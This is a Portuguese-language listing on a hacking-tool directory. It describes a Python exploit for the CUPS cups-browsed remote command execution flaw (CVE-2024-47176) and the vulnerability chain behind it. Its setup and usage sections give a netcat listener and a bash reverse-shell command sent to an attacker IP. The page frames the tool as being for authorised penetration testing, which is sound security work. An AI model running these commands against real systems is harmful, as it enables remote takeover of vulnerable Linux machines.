Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-47176 — Exploit em Python para CVE-2024-47176 que obtém execução remota de comandos no CUPS cups-browsed por meio de pacotes UDP manipulados. Inclui entrega de payload de shell reverso para teste de penetração autorizado. | Kitploit
Ferramentas/GitHubGitHub/gumerzzzindo/cve-2024-47176
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

Exploit em Python para CVE-2024-47176 que obtém execução remota de comandos no CUPS cups-browsed por meio de pacotes UDP manipulados. Inclui entrega de payload de shell reverso para teste de penetração autorizado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 2 mesesAinda não revisado

CVE-2024-47176 — Execução Remota de Comandos no CUPS

CVE CVSS Python Platform License

Apenas para fins educacionais e testes de penetração autorizados.


Índice

  • Descrição
  • Sistemas Afetados
  • CVEs Relacionadas
  • Pré-requisitos
  • Configuração
  • Uso
  • Aviso Legal

Descrição

O CUPS (Common UNIX Printing System) é um sistema de impressão de código aberto que gerencia impressoras em rede. O CVE-2024-47176 visa o daemon cups-browsed, que se liga a INADDR_ANY:631 e confia cegamente em pacotes de qualquer origem.

Ao criar um pacote UDP malicioso que aciona uma solicitação IPP Get-Printer-Attributes, um atacante pode fazer com que o cups-browsed se conecte a um servidor controlado pelo atacante — e, quando combinado com as vulnerabilidades abaixo, alcançar execução arbitrária de comandos remotos.


Sistemas Afetados

ComponenteCondição
cups-browsedEscutando na porta UDP 631 (padrão)
CUPS < 2.4.11Versões não corrigidas
Sistemas Linux com CUPS expostoPorta 631 acessível pelo atacante

CVEs Relacionadas


Pré-requisitos

  • Máquina alvo com porta 631 (IPP/UDP) exposta
  • Python 3.x na sua máquina de ataque
  • nmap (opcional, para reconhecimento)
  • Um listener netcat para o shell reverso

Configuração

1. Clone o repositório:

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. Instale a dependência Python necessária:

root@kitploit:~
pip install ippserver

3. Inicie um listener na sua máquina:

root@kitploit:~
nc -lvnp <PORT>

Uso

root@kitploit:~
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

Exemplo — shell reverso:

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

Após executar o exploit, acione um trabalho de impressão no alvo (ou aguarde uma verificação automática) para executar o payload.


Aviso Legal

Este repositório destina-se exclusivamente a fins educacionais e pesquisa de segurança autorizada. Usar esta ferramenta contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar é ilegal e antiético.

Baixar ferramenta
CVEDescrição
CVE-2024-47176cups-browsed confia em qualquer pacote UDP na porta 631
CVE-2024-47076libcupsfilters não sanitiza atributos IPP
CVE-2024-47175libppd injeta dados não sanitizados em arquivos PPD
CVE-2024-47177cups-filters permite execução de comandos via PPD